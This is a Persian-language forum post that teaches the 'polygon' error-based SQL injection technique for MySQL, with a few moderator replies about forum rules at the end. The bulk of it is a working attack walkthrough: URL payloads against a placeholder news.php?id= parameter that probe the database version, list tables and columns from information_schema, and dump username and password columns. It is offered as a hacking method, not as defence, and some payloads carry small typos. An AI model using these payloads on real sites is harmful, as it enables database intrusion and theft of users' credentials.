من  MR.MSA
در این پست قصد دارم متد polygon رو به شما آموزش بدهم . 
------------------------------------
یکی از کاربرد های متد polygon زمانی است که :‌
در یک تارگت  order+by و ... را زدید و تعداد تیبل ها را بدست اوردید 
و بعد خواستید تیبل ها را بیرون بکشید و با خطای 
error different number of columns
مواجه شدید می توانید از  متد polygon استفاده کنید .
 
یکی دیگر از کاربرد های متد polygon زمانی است که :‌
با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از  متد polygon استفاده کنید . 
 
------------------------------------
سطح متد : حرفه ای 
------------------------------------
 
روش استفاده از متد polygon :‌
ابتدا مقدار را پاک کنید : 
site.com/news.php?id=1
( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . )
--------------
سپس این عبارت را قرار می دهید : 
This is the hidden content, please ورود یا ثبت نام polygon((select*from(select*from(select@@version)f)x))
و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . 
یک جورایی میشه گفت جای که version است ستون آسیب پذیره. 
--------------
خب حالا می رویم سراغ بیرون کشیدن تیبل ها : 
site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند .
توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁)
--------------
(برای مثال تیبل مهمی که بدست می آوریم user است )
و حالا برای  بیرون کشیدن ستون های یک جدول  : 
 
site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x))
قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن )
اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . 
--------------
و می مونه بیرون کشیدن اطلاعات ستون های مهم :
site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x))
باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . 
اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . 
  ------------------------------------
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم 
برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم .
هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
 
 

با سلام خدمت شما دوست عزیز
دو نکته خیلی مهم !!!!
۱- نام کاربری خودتون رو به یک چیز مناسب تغییر دهید !
۲- از ارسال سوالات زیاااد در یک تاپیک خودداری کنید !!!! سوالاتتون رو در تاپیک های دیگر با موضوع مخصوص خودش
باز کنید تا برای دیگران راحت تر قابل جست و جو باشد !!!!!
 
در صورت مشاهده دوباره با شما بر خورد می شود !
 
با احترام ، موفق و پیروز باشید . 

با سلام و عرض ادب
دوست عزیز تاپیک برای سایت ۹۸ هست! 
احتمالا ایشون تا الان مشکلشون حل شده 
و اینکه قرار دادن لینک درست نیست! لطفا قوانین رو مطالعه کنید.
موفق باشید.

This is the hidden content, please ورود یا ثبت نام  

This is the hidden content, please ورود یا ثبت نام موفق باشید .